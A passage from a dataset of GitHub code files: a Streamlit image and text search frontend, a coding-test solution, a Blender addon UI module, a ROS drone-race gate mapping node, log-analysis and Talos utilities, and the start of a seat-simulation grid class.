make similar to indexed Docs\n \"\"\"\n print('connect client to ', server, port)\n client = Client(host=server, protocol=\"grpc\", port=port)\n query_doc = document\n if query_doc.blob != b'':\n query_doc.convert_blob_to_image_tensor()\n query_doc.set_image_tensor_shape((224, 224))\n response = client.search(\n query_doc,\n parameters={\"limit\": limit, 'filter': {}},\n return_results=True,\n show_progress=True,\n )\n\n return response[0].matches\n\n def convert_file_to_document(query):\n data = query.read()\n doc = Document(blob=data)\n return doc\n\n # Layout\n st.set_page_config(page_title=\"NOW\", page_icon='https://jina.ai/favicon.ico')\n\n st.markdown(\n body=UI.css,\n unsafe_allow_html=True,\n )\n col1, mid, col2 = st.columns([1, 1, 20])\n with col1:\n st.image('https://jina.ai/favicon.ico', width=60)\n with col2:\n st.header(\"NOW \")\n\n # design and create toggle button\n st.write(\n '',\n unsafe_allow_html=True,\n )\n st.write(\n '',\n unsafe_allow_html=True,\n )\n if output_modality == 'image':\n media_type = st.radio(\n '',\n [\"Text\", \"Image\", 'Webcam'],\n on_change=clear_match,\n )\n elif output_modality == 'text':\n media_type = st.radio(\n '',\n [\"Image\", \"Text\", 'Webcam'],\n on_change=clear_match,\n )\n\n if media_type == \"Image\":\n upload_c, preview_c = st.columns([12, 1])\n query = upload_c.file_uploader(\"\")\n if query:\n doc = convert_file_to_document(query)\n st.image(doc.blob, width=160)\n st.session_state.matches = search_by_file(\n document=doc, server=host, port=port\n )\n if da_img is not None:\n st.subheader(\"samples:\")\n img_cs = st.columns(5)\n txt_cs = st.columns(5)\n for doc, c, txt in zip(da_img, img_cs, txt_cs):\n with c:\n st.image(doc.blob if doc.blob else doc.tensor, width=100)\n with txt:\n if st.button('Search', key=doc.id):\n st.session_state.matches = search_by_file(\n document=doc,\n server=host,\n port=port,\n )\n\n elif media_type == \"Text\":\n query = st.text_input(\"\", key=\"text_search_box\")\n if query:\n st.session_state.matches = search_by_t(input=query, server=host, port=port)\n if st.button(\"Search\", key=\"text_search\"):\n st.session_state.matches = search_by_t(input=query, server=host, port=port)\n if da_txt is not None:\n st.subheader(\"samples:\")\n c1, c2, c3 = st.columns(3)\n c4, c5, c6 = st.columns(3)\n for doc, col in zip(da_txt, [c1, c2, c3, c4, c5, c6]):\n with col:\n if st.button(doc.content, key=doc.id, on_click=clear_text):\n st.session_state.matches = search_by_t(\n input=doc.content, server=host, port=port\n )\n\n elif media_type == 'Webcam':\n snapshot = st.button('Snapshot')\n\n class VideoProcessor:\n snapshot: np.ndarray = None\n\n def recv(self, frame):\n self.snapshot = frame.to_ndarray(format=\"rgb24\")\n return av.VideoFrame.from_ndarray(self.snapshot, format='rgb24')\n\n ctx = webrtc_streamer(\n key=\"jina-now\",\n video_processor_factory=VideoProcessor,\n client_settings=WEBRTC_CLIENT_SETTINGS,\n )\n\n if ctx.video_processor:\n if snapshot:\n query = ctx.video_processor.snapshot\n st.image(query, width=160)\n st.session_state.snap = query\n doc = Document(tensor=query)\n doc.convert_image_tensor_to_blob()\n st.session_state.matches = search_by_file(\n document=doc, server=host, port=port\n )\n elif st.session_state.snap is not None:\n st.image(st.session_state.snap, width=160)\n else:\n clear_match()\n\n if st.session_state.matches:\n matches = deepcopy(st.session_state.matches)\n st.header('Search results')\n # Results area\n c1, c2, c3 = st.columns(3)\n c4, c5, c6 = st.columns(3)\n c7, c8, c9 = st.columns(3)\n all_cs = [c1, c2, c3, c4, c5, c6, c7, c8, c9]\n # # TODO dirty hack to filter out text. Instead output modality should be passed as parameter\n # matches = [m for m in matches if m.tensor is None]\n for m in matches:\n m.scores['cosine'].value = 1 - m.scores['cosine'].value\n sorted(matches, key=lambda m: m.scores['cosine'].value, reverse=True)\n matches = [\n m\n for m in matches\n if m.scores['cosine'].value > st.session_state.min_confidence\n ]\n for c, match in zip(all_cs, matches):\n match.mime_type = output_modality\n\n if output_modality == 'text':\n display_text = profanity.censor(match.text)\n body = f\"
{display_text}
\"\n if match.tags.get('additional_info'):\n additional_info = match.tags.get('additional_info')\n if type(additional_info) == str:\n additional_info_text = additional_info\n elif type(additional_info) == list:\n if len(additional_info) == 1:\n # assumes just one line containing information on text name and creator, etc.\n additional_info_text = additional_info\n elif len(additional_info) == 2:\n # assumes first element is text name and second element is creator name\n additional_info_text = (\n f\"{additional_info[0]} \"\n f\"by {additional_info[1]}\"\n )\n else:\n additional_info_text = \" \".join(additional_info)\n body += f\"
{additional_info_text}
\"\n body += \"\"\n c.markdown(\n body=body,\n unsafe_allow_html=True,\n )\n elif match.uri is not None:\n if match.blob != b'':\n match.convert_blob_to_datauri()\n if match.tensor is not None:\n match.convert_image_tensor_to_uri()\n c.image(match.convert_blob_to_datauri().uri)\n st.markdown(\"\"\"---\"\"\")\n st.session_state.min_confidence = st.slider(\n 'Confidence threshold',\n 0.0,\n 1.0,\n key='slider',\n on_change=update_conf,\n )\n\n\ndef update_conf():\n st.session_state.min_confidence = st.session_state.slider\n\n\ndef clear_match():\n st.session_state.matches = None\n st.session_state.slider = 0.0\n st.session_state.min_confidence = 0.0\n st.session_state.snap = None\n\n\ndef clear_text():\n st.session_state.text_search_box = ''\n\n\ndef load_data(data_path: str) -> DocumentArray:\n if data_path.startswith('http'):\n try:\n # TODO try except is used as workaround\n # in case load_data is called two times from two frontends it can happen that\n # one of the calls created the directory right after checking that it does not exist\n # this caused errors. Now the error will be ignored.\n # Can not use `exist=True` because it is not available in py3.7\n os.makedirs('data/tmp')\n except:\n pass\n url = data_path\n data_path = (\n f\"data/tmp/{base64.b64encode(bytes(url, 'utf-8')).decode('utf-8')}.bin\"\n )\n if not os.path.exists(data_path):\n with urlopen(url) as f:\n content = f.read()\n with open(data_path, 'wb') as f:\n f.write(content)\n\n try:\n da = DocumentArray.load_binary(data_path)\n except Exception:\n da = DocumentArray.load_binary(data_path, compress='gzip')\n return da\n\n\ndef setup_session_state():\n if 'matches' not in st.session_state:\n st.session_state.matches = None\n\n if 'min_confidence' not in st.session_state:\n st.session_state.min_confidence = 0.0\n\n if 'im' not in st.session_state:\n st.session_state.im = None\n\n if 'snap' not in st.session_state:\n st.session_state.snap = None\n\n\nif __name__ == '__main__':\n deploy_streamlit()\n","repo_name":"zhenwang23/now","sub_path":"now/frontend/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":12832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"75084138186","text":"'''\n시간\n제한: 2\n초메모리\n제한: 256\nMB\n문제\n설명\n세\n자매가\n해외여행\n중\n기념품\n가게에\n왔습니다.\n\n이\n기념품\n가게에서는\n한번에\n50\n달러\n이상\n지출하면, 10\n달러를\n할인해주는\n행사를\n하고\n있습니다.\n그녀들은\n구매한\n물건을\n합하여\n계산하면, 각자\n따로\n지불하는\n것보다\n적게\n지불할\n수\n있다는\n것을\n깨달았습니다.\n\n예를들어\n그들이\n각각\n46\n달러, 62\n달러, 9\n달러만큼의\n상품을\n구입하는\n경우, 46\n달러와\n9\n달러를\n합치는\n것으로\n2\n번의\n구매를\n할\n수\n있습니다.\n이렇게\n하면\n55\n달러와\n62\n달러로\n거래하게\n되어\n총\n20\n달러의\n할인을\n받을\n수\n있습니다.\n\n여기\ngoods\n가\n주어집니다.\ngoods\n의\n각\n요소는\n한\n명이\n구매하려는\n물품의\n총\n비용입니다.\n\n세\n자매가\n모든\n상품을\n구입하는데\n드는\n최소\n비용을\n리턴하세요.\n\n(그녀들은 위 설명처럼 합쳐서 구매할 수 있지만, 자기가 구입할 상품을 나눠서 구매하지는 않습니다.)\n\n참고 / 제약\n사항\ngoods\n는\n오직\n3\n개의\n요소만\n가집니다.\ngoods\n의\n각\n요소는\n1\n이상\n99\n이하의\n정수입니다.\n테스트\n케이스\ngoods = [46, 62, 9]\n리턴(정답): 97\n문제\n설명에\n나온\n예제입니다.\n\ngoods = [50, 62, 93]\n리턴(정답): 175\n모두\n각자\n계산하는\n것이\n가장\n좋은\n방법입니다.\n\ngoods = [5, 31, 15]\n리턴(정답): 41\n세\n번의\n구매를\n한번에\n합쳐서\n해야\n구매\n비용을\n가장\n낮출\n수\n있습니다.\n\ngoods = [5, 3, 15]\n리턴(정답): 23\n할인\n행사를\n받을\n방법이\n존재하지\n않습니다.\n'''\n\n#핵심 소스코드의 설명을 주석으로 작성하면 평가에 큰 도움이 됩니다.\nclass Solution:\n def solution(self, goods):\n tmp =0\n sum = 0\n for i in goods:\n if i>=50 :\n i = i-10\n sum += i\n else:\n tmp += i\n if tmp>=50:\n tmp -=10\n sum += tmp\n else:\n sum += tmp\n return sum\n\n\n\n","repo_name":"moonyeol/algorithm","sub_path":"python/한이음ict코테-1.py","file_name":"한이음ict코테-1.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42603627779","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\n# library imports\nimport bpy\nfrom bpy_extras.io_utils import ImportHelper\nimport os\nimport math\nimport shutil\nfrom mathutils import Vector\n\n# addon imports\nfrom .. import conf\nfrom .. import util\nfrom . import mobs\nfrom .. import tracking\n\n\n# -----------------------------------------------------------------------------\n# class definitions\n# -----------------------------------------------------------------------------\n\n\nclass MCPREP_OT_reload_spawners(bpy.types.Operator):\n\t\"\"\"Relaod meshswapping and spawning lists\"\"\"\n\tbl_idname = \"mcprep.reload_spawners\"\n\tbl_label = \"Reload meshswap and mob spawners\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t@tracking.report_error\n\tdef execute(self, context):\n\t\tbpy.ops.mcprep.reload_meshswap()\n\t\tbpy.ops.mcprep.reload_mobs()\n\t\tbpy.ops.mcprep.reload_items()\n\t\treturn {'FINISHED'}\n\n\nclass MCPREP_OT_spawn_path_reset(bpy.types.Operator):\n\t\"\"\"Reset the spawn path to the default specified in the addon preferences panel\"\"\"\n\tbl_idname = \"mcprep.spawn_path_reset\"\n\tbl_label = \"Reset spawn path\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t@tracking.report_error\n\tdef execute(self,context):\n\t\taddon_prefs = util.get_user_preferences(context)\n\t\tcontext.scene.mcprep_mob_path = addon_prefs.mob_path\n\t\tmobs.update_rig_list(context)\n\t\treturn {'FINISHED'}\n\n\n# -----------------------------------------------------------------------------\n#\tUI list related\n# -----------------------------------------------------------------------------\n\n\nclass MCPREP_UL_mob(bpy.types.UIList):\n\t\"\"\"For mob asset listing UIList drawing\"\"\"\n\tdef draw_item(self, context, layout, data, set, icon, active_data, active_propname, index):\n\t\ticon = \"mob-{}\".format(set.index)\n\t\tif self.layout_type in {'DEFAULT', 'COMPACT'}:\n\t\t\tif not conf.use_icons:\n\t\t\t\tlayout.label(text=set.name)\n\t\t\telif conf.use_icons and icon in conf.preview_collections[\"mobs\"]:\n\t\t\t\tlayout.label(text=set.name,\n\t\t\t\t\ticon_value=conf.preview_collections[\"mobs\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=set.name, icon=\"BLANK1\")\n\n\t\telif self.layout_type in {'GRID'}:\n\t\t\tlayout.alignment = 'CENTER'\n\t\t\tif conf.use_icons and icon in conf.preview_collections[\"mobs\"]:\n\t\t\t\tlayout.label(text=\"\",\n\t\t\t\t\ticon_value=conf.preview_collections[\"mobs\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"\", icon='QUESTION')\n\n\nclass MCPREP_UL_meshswap(bpy.types.UIList):\n\t\"\"\"For meshswap asset listing UIList drawing\"\"\"\n\tdef draw_item(self, context, layout, data, set, icon, active_data, active_propname, index):\n\t\tif self.layout_type in {'DEFAULT', 'COMPACT'}:\n\t\t\tlayout.label(text=set.name)\n\t\t\t# col.prop(set, \"name\", text=\"\", emboss=False)\n\n\t\telif self.layout_type in {'GRID'}:\n\t\t\tlayout.alignment = 'CENTER'\n\t\t\tlayout.label(text=\"\", icon='QUESTION')\n\n\nclass MCPREP_UL_item(bpy.types.UIList):\n\t\"\"\"For meshswap asset listing UIList drawing\"\"\"\n\tdef draw_item(self, context, layout, data, set, icon, active_data, active_propname, index):\n\t\ticon = \"item-{}\".format(set.index)\n\t\tif self.layout_type in {'DEFAULT', 'COMPACT'}:\n\t\t\tif not conf.use_icons:\n\t\t\t\tlayout.label(text=set.name)\n\t\t\telif conf.use_icons and icon in conf.preview_collections[\"items\"]:\n\t\t\t\tlayout.label(text=set.name,\n\t\t\t\t\ticon_value=conf.preview_collections[\"items\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=set.name, icon=\"BLANK1\")\n\n\t\telif self.layout_type in {'GRID'}:\n\t\t\tlayout.alignment = 'CENTER'\n\t\t\tif conf.use_icons and icon in conf.preview_collections[\"items\"]:\n\t\t\t\tlayout.label(text=\"\",\n\t\t\t\t\ticon_value=conf.preview_collections[\"items\"][icon].icon_id)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"\", icon='QUESTION')\n\n\nclass ListMobAssetsAll(bpy.types.PropertyGroup):\n\t\"\"\"For listing hidden group of all mobs, regardless of category\"\"\"\n\tdescription = bpy.props.StringProperty()\n\tcategory = bpy.props.StringProperty()\n\tmcmob_type = bpy.props.StringProperty()\n\tindex = bpy.props.IntProperty(min=0, default=0) # for icon drawing\n\n\nclass ListMobAssets(bpy.types.PropertyGroup):\n\t\"\"\"For UI drawing of mob assets and holding data\"\"\"\n\tdescription = bpy.props.StringProperty()\n\tcategory = bpy.props.StringProperty() # category it belongs to\n\tmcmob_type = bpy.props.StringProperty()\n\tindex = bpy.props.IntProperty(min=0, default=0) # for icon drawing\n\n\nclass ListMeshswapAssets(bpy.types.PropertyGroup):\n\t\"\"\"For UI drawing of meshswap assets and holding data\"\"\"\n\tblock = bpy.props.StringProperty() # virtual enum, Group/name\n\tdescription = bpy.props.StringProperty()\n\n\nclass ListItemAssets(bpy.types.PropertyGroup):\n\t\"\"\"For UI drawing of item assets and holding data\"\"\"\n\t# inherited: name\n\tdescription = bpy.props.StringProperty()\n\tpath = bpy.props.StringProperty(subtype='FILE_PATH')\n\tindex = bpy.props.IntProperty(min=0, default=0) # for icon drawing\n\n\n# -----------------------------------------------------------------------------\n#\tRegistration\n# -----------------------------------------------------------------------------\n\n\nclasses = (\n\tListMobAssetsAll,\n\tListMobAssets,\n\tListMeshswapAssets,\n\tListItemAssets,\n\tMCPREP_UL_mob,\n\tMCPREP_UL_meshswap,\n\tMCPREP_UL_item,\n\tMCPREP_OT_reload_spawners,\n\tMCPREP_OT_spawn_path_reset,\n)\n\n\ndef register():\n\tfor cls in classes:\n\t\tutil.make_annotations(cls)\n\t\tbpy.utils.register_class(cls)\n\n\ndef unregister():\n\tfor cls in reversed(classes):\n\t\tbpy.utils.unregister_class(cls)\n","repo_name":"Xinecraft/MCprep","sub_path":"MCprep_addon/spawner/spawn_util.py","file_name":"spawn_util.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"19875742369","text":"#!/usr/bin/env python\n\"\"\"\nBuild a map of observed markers relative to the camera.\nPipeline\n1. Subscribe detected markers pose\n2. Subscribe ego pose in time\n3. Transform markers local pose to world pose\n4. Data association: Identify unique gates by Weighted nearest neighbour (euclidean distance threshold?)\n4.5. Correct flipping Z axis with a median moving window?\n5. Update pose estimation per observed gate. Lineal KF\n6. Publish results as markers for visualization and topic for Planning\n7. RMSE Error calculation with ground truth\n\nTODO:\n - Include new message array with confidence per gate by numbers of observations per period\n - Use real ego pose covariances to compute KF\n - Weighted median average for low confidence gates\n\n\"\"\"\n\n\nfrom __future__ import print_function\n\nimport rospy\n\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom markertracker_node.msg import GateMarker, GateMarkersArray\nfrom tf2_geometry_msgs import do_transform_pose\nfrom geometry_msgs.msg import Point, PoseWithCovarianceStamped, PoseArray, Pose #, Point32\n\nimport tf2_ros as tf2\nimport math\n#import tf.transformations\n\n\nclass Gate:\n\n def __init__(self, _id):\n\n # TODO: Move to params\n self.observations_size = 75 # Only the most relevant observations are kept\n\n # Put better ones at top, worse ones at the button\n self.observations = list()\n\n self.total_observations = 0\n self.confidence = 0.0\n\n self.id = _id\n self.name = 'Gate'+str(_id)\n\n print('*** New gate:' + self.name)\n\n def add_marker_observation(self, marker):\n\n self.total_observations += 1\n\n observation = {}\n observation['pose'] = marker.pose_cov_stamped.pose.pose.pose\n observation['covariance'] = marker.pose_cov_stamped.pose.covariance\n _area = self._area_of_quadrilateral(marker.corners)\n observation['weight'] = _area\n\n if len(self.observations) >= self.observations_size: # start popping\n if _area < self.observations[-1]['weight']:\n return\n else:\n self.observations.pop(-1)\n\n self.observations.append(observation)\n\n self.observations = sorted(self.observations, key=lambda o: o['weight'], reverse=True)\n\n self.confidence = self._calc_confidence()\n\n #print(self.observations[0])\n\n def _calc_confidence(self):\n # [0,1] Confidence based on observations to be sure about a gate is real\n #confidence = self.total_observations / self.observations_size\n\n confidence = len(self.observations) / float(self.observations_size)\n if confidence > 1.0: confidence = 1.0\n\n return confidence\n\n def get_best_pose_estimation(self):\n\n pose = self.observations[0]['pose']\n\n return pose\n\n def _area_of_quadrilateral(self, corners):\n a = math.sqrt((corners[0] - corners[2]) ** 2 + (corners[1] - corners[3]) ** 2)\n b = math.sqrt((corners[2] - corners[4]) ** 2 + (corners[3] - corners[5]) ** 2)\n c = math.sqrt((corners[4] - corners[6]) ** 2 + (corners[5] - corners[7]) ** 2)\n d = math.sqrt((corners[6] - corners[0]) ** 2 + (corners[7] - corners[1]) ** 2)\n return (a + b + c + d) / 2\n\n def euclidean_distance_observation(self, marker):\n point1 = self.observations[0]['pose'].position\n point2 = marker.pose_cov_stamped.pose.pose.pose.position\n return math.sqrt((point2.x - point1.x) ** 2 + (point2.y - point1.y) ** 2 + (point2.z - point1.z) ** 2)\n\n\nclass GateMap:\n\n def __init__(self):\n self.gates = list()\n # TODO: move to params\n self.d_threshold = 3 # cluster observation when closer than threshold by euclidean distance in meters\n\n def process_marker_observation(self, marker):\n\n # First observation\n\n if len(self.gates) == 0:\n gate = Gate(1)\n gate.add_marker_observation(marker)\n self.gates.append(gate)\n return\n\n for g in self.gates:\n\n print(g.name, g.total_observations, g.confidence)\n\n if g.euclidean_distance_observation(marker) < self.d_threshold:\n g.add_marker_observation(marker)\n return\n\n # Create a new gate in the map\n gate = Gate(len(self.gates)+1)\n gate.add_marker_observation(marker)\n self.gates.append(gate)\n\n\n\n\nclass SubscriberPublisherObservations:\n\n def __init__(self, node_name):\n\n self.node_name = node_name\n\n # Params\n _input_markers_topic = rospy.get_param(\"~input_markers_topic\", default='/markertracker_node/gate_markers')\n self.camera_frame_id = rospy.get_param(\"~parent_frame_id\", default='firefly/vi_sensor/base_link')\n self.fixed_frame_id = rospy.get_param(\"~fixed_frame_id\", default='world')\n\n # Subscribers\n self.markers_sub = rospy.Subscriber(_input_markers_topic, GateMarkersArray, self._markers_callback, queue_size=100)\n self.tf_buffer = tf2.Buffer()\n self.tf_listener = tf2.TransformListener(self.tf_buffer)\n\n # To store the gate map\n self.gates_map = GateMap()\n\n\n # Publishers\n self.poses_pub = rospy.Publisher(node_name + '/poses', PoseArray, queue_size=100)\n self.viz_markers_pub = rospy.Publisher(node_name + '/visualization_markers', MarkerArray, queue_size=100)\n\n ## Rospy loop\n r = rospy.Rate(5)\n while not rospy.is_shutdown():\n #self.marker_viz_pub.publish(self.ground_truth_markers)\n #self.gate_pose_pub.publish(self.ground_truth_poses)\n\n # Publish best map estimations\n self._build_gate_messages_and_publish()\n\n r.sleep()\n\n\n\n def _build_gate_messages_and_publish(self):\n\n #TODO: move to params\n _confidence_threshold = 0.05 # Ignore gates with lower confidence than threshold\n\n if len(self.gates_map.gates) == 0: return False\n\n marker_viz_array = MarkerArray()\n pose_array = PoseArray()\n pose_array.header.frame_id = self.fixed_frame_id\n\n for g in self.gates_map.gates:\n\n if g.confidence < _confidence_threshold: continue\n\n pose = g.get_best_pose_estimation()\n gate_id = g.id\n\n pose_array.poses.append(pose)\n\n marker_msg = self._create_gate_rviz_marker(pose, gate_id, self.fixed_frame_id)\n _str_label = \"{} {:.0f}%\".format(g.name, g.confidence*100)\n label_msg = self._create_gate_rviz_label(pose, gate_id, _str_label, self.fixed_frame_id)\n marker_viz_array.markers.append(label_msg)\n marker_viz_array.markers.append(marker_msg)\n\n\n self.poses_pub.publish(pose_array)\n self.viz_markers_pub.publish(marker_viz_array)\n\n\n def _create_gate_rviz_marker(self, pose, gate_id, frame_id):\n\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n\n marker.header.frame_id = frame_id\n marker.ns = self.node_name + '/gate_marker'\n marker.id = gate_id\n\n marker.type = marker.CUBE\n marker.action = marker.ADD\n\n # TODO: dims to params\n marker.scale.x = 0.025\n marker.scale.y = 1\n marker.scale.z = 1\n\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 1.0\n marker.color.a = 0.5\n\n marker.lifetime = rospy.Duration() # forever\n\n marker.pose = pose\n\n return marker\n\n def _create_gate_rviz_label(self, pose, gate_id, text, frame_id):\n\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n\n marker.header.frame_id = frame_id\n marker.ns = self.node_name + '/gate_label'\n marker.id = gate_id\n\n marker.text = text\n marker.type = marker.TEXT_VIEW_FACING\n marker.action = marker.ADD\n\n # TODO: dims to params\n #marker.scale.x = 0.025\n #marker.scale.y = 1\n marker.scale.z = 0.5\n\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 1.0\n marker.color.a = 0.75\n\n marker.lifetime = rospy.Duration() # forever\n\n marker.pose = pose\n\n return marker\n\n\n def _markers_callback(self, data):\n\n if len(data.marker) <= 0:\n return None\n\n stamp = data.camera_frame_stamp # For synchronizing TF\n\n try:\n camera_tf = self.tf_buffer.lookup_transform(self.fixed_frame_id, self.camera_frame_id, stamp, rospy.Duration(0.1))\n #print('camera_tf', camera_tf)\n except (tf2.LookupException, tf2.ConnectivityException, tf2.ExtrapolationException):\n return None\n\n # world_pose_array = MarkersArray()\n\n for m in data.marker:\n pose = m.pose_cov_stamped.pose\n #print(pose)\n pose_stamped_world = do_transform_pose(pose, camera_tf)\n m.pose_cov_stamped.pose.pose = pose_stamped_world\n self.gates_map.process_marker_observation(m)\n\n #print(pose_stamped_world)\n\n\n\n\n\nif __name__ == '__main__':\n\n _node_name = 'gates_map_node'\n\n print('* {} starting... '.format(_node_name), end=\"\")\n\n rospy.init_node(_node_name, anonymous=True)\n\n SubscriberPublisherObservations(_node_name)\n\n print('Ready.')\n\n rospy.spin()\n","repo_name":"Veilkrand/drone_race","sub_path":"drone_map_builder/src/observed_gates_map_node.py","file_name":"observed_gates_map_node.py","file_ext":"py","file_size_in_byte":9229,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"12126928287","text":"from src.measurements.channel_measurements.base_channel_measurement import BaseChannelMeasurement\nfrom src.constants import (PACKET_DROPPED, EXECTION_TIME, READ_TIME,\n PACKET_PUSHED, PACKET_RETRIEVED, FILL_TIME)\n\n\nclass PacketLifeTimeMeasurement(BaseChannelMeasurement):\n \"\"\"Calculate the value of the spent time of packets in specific channels channel_packet_life_time\n \"\"\"\n def run(self):\n channels = self._channel_manager.get_channels()\n channels_packet_life_time = [self.__calculate_channel_packet_life_time(c)\n for c in channels]\n\n total_packets_life = sum(channels_packet_life_time)\n for i, channel in enumerate(channels):\n if total_packets_life:\n packet_life_time = channels_packet_life_time[i] / total_packets_life * 100\n else:\n packet_life_time = 0\n\n channel.add_measure(self._measurement_key,\n [self._packet_cycle, packet_life_time])\n\n self._packet_cycle += 1\n\n def __calculate_channel_packet_life_time(self, channel):\n \"\"\"Calculate the value of the spent time of packets in specific channels channel_packet_life_time\n which is the sum of the following events :\n fill_time_avg =sum of average time spent between acquiring the Packets and pushing it into the buffers\n read_time_avg= sum of average time spent between retrieving a Packet and releasing it by the retriever\n exec_time_avg= sum of average time spent by a Scheduler thread servicing a Channel callback\n (pushed_time_avg-retrieved_time_avg) time between pushing packet into buffer and retrieving it for execution\n\n Args:\n channel: the channel which we want to calculate the measurement for\n\n Returns:\n A real number represents the channel share of the packet's life time\n \"\"\"\n\n fill_time_avg = self.__sum_average_of_event(channel, FILL_TIME)\n read_time_avg = self.__sum_average_of_event(channel, READ_TIME)\n exec_time_avg = self.__sum_average_of_event(channel, EXECTION_TIME)\n pushed_time_avg = self.__sum_average_of_event(channel, PACKET_PUSHED)\n retrieved_time_avg = self.__sum_average_of_event(channel, PACKET_RETRIEVED)\n\n channel_packet_life_time = fill_time_avg + read_time_avg + exec_time_avg + abs(retrieved_time_avg -\n pushed_time_avg)\n\n return channel_packet_life_time\n\n def _measure(self, channel):\n pass\n\n @staticmethod\n def __sum_average_of_event(channel, event):\n \"\"\" calculate the sum of the average values of specific event of the channel sum_average\n Args:\n channel: the channel which we want to calculate the sum of the average values of specific events\n event : the name of the event we want to calculate sum of the average values for\n\n Returns:\n An integer or real number represent the sum of averages\n \"\"\"\n\n avg = [x.get_avg() for x in channel.get_event(event)]\n return sum(avg)\n","repo_name":"gerazo/pipert","sub_path":"log_analyzer/src/measurements/channel_measurements/packet_life_time_measurement.py","file_name":"packet_life_time_measurement.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"28881528809","text":"from zipfile import ZipFile\n\nfrom pandas import read_csv\nfrom numpy import load\n\nfrom talos.utils.load_model import load_model\n\n\nclass Restore:\n\n '''Restores the scan_object that had been stored locally as a result\n of talos.Deploy(scan_object, 'example')\n\n USE:\n\n diabetes = ta.Scan(x, y, p, input_model)\n ta.Deploy(diabetes, 'diabetes')\n ta.Restore('diabetes.zip')\n\n '''\n\n def __init__(self, path_to_zip):\n\n # create paths\n self.path_to_zip = path_to_zip\n self.extract_to = path_to_zip.replace('.zip', '')\n self.package_name = self.extract_to.split('/')[-1]\n self.file_prefix = self.extract_to + '/' + self.package_name\n\n # extract the zip\n # unpack_archive(self.path_to_zip, self.extract_to)\n z = ZipFile(self.path_to_zip, mode='r')\n z.extractall(self.extract_to)\n\n # add params dictionary\n self.params = load(self.file_prefix + '_params.npy').item()\n\n # add experiment details\n self.details = read_csv(self.file_prefix + '_details.txt', header=None)\n\n # add x data sample\n self.x = read_csv(self.file_prefix + '_x.csv', header=None)\n\n # add y data sample\n self.y = read_csv(self.file_prefix + '_y.csv', header=None)\n\n # add model\n self.model = load_model(self.file_prefix + '_model')\n\n # add results\n self.results = read_csv(self.file_prefix + '_results.csv')\n self.results.drop('Unnamed: 0', axis=1, inplace=True)\n\n # clean up\n del self.extract_to, self.file_prefix\n del self.package_name, self.path_to_zip\n","repo_name":"gaskamichal/talos","sub_path":"talos/commands/restore.py","file_name":"restore.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"42968972641","text":"from __future__ import annotations\n\nfrom enum import Enum\nfrom typing import List, Optional, Set, TextIO\n\nINPUT = \"input\"\n\nNEIGHBOUR_VECTORS = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]\n\n\nclass SeatStatus(Enum):\n EMPTY = \"L\"\n FULL = \"#\"\n FLOOR = \".\"\n\n\nclass Cell:\n def __init__(self, status: str, x: int, y: int) -> None:\n self.status = SeatStatus(status)\n self.x = x\n self.y = y\n self.neighbours: List[Cell] = []\n\n @property\n def is_empty(self) -> bool:\n return self.status == SeatStatus.EMPTY\n\n @property\n def is_full(self) -> bool:\n return self.status == SeatStatus.FULL\n\n @property\n def is_floor(self) -> bool:\n return self.status == SeatStatus.FLOOR\n\n def toggle(self) -> None:\n if self.is_full:\n self.status = SeatStatus.EMPTY\n else:\n self.status = SeatStatus.FULL\n\n def compute_neighbours(self, grid: Grid, strict_adjacency: bool) -> None:\n for x_vector, y_vector in NEIGHBOUR_VECTORS:\n x_offset = 0\n y_offset = 0\n while True:\n x_offset += x_vector\n y_offset += y_vector\n\n point = grid.safe_get_point(self.x + x_offset, self.y + y_offset)\n if point is None:\n break\n if not point.is_floor:\n self.neighbours.append(point)\n break\n if strict_adjacency:\n break\n\n def __str__(self) -> str:\n return str(self.status.value)\n\n\nclass Grid:\n def __init__(self, fin: TextIO, strict_adjacency: bool, num_occupied_to_move: int) -> None:\n self.grid = [[Cell(val, x, y) for x, val in enumerate(line.strip())] for y, line in enumerate(fin)]\n self.num_occupied_to_move = num_occupied_to_move\n\n self.could_change = set()\n for y in range(len(self.grid)):\n for x in range(len(self.grid[y])):\n if not self.grid[y][x].is_floor:\n self.grid[y][x].compute_neighbours(self, strict_adjacency)\n\n self.could_change.add(self.grid[y][x])\n\n def safe_get_point(self, x: int, y: int) -> Optional[Cell]:\n if 0 <= y < len(self.grid):\n if 0 <= x < len(self.grid[y]):\n return self.grid[y][x]\n return None\n\n def step(self) -> bool:\n changes: List[Cell] = []\n new_could_change: Set[Cell] = set()\n for point in self.could_change:\n 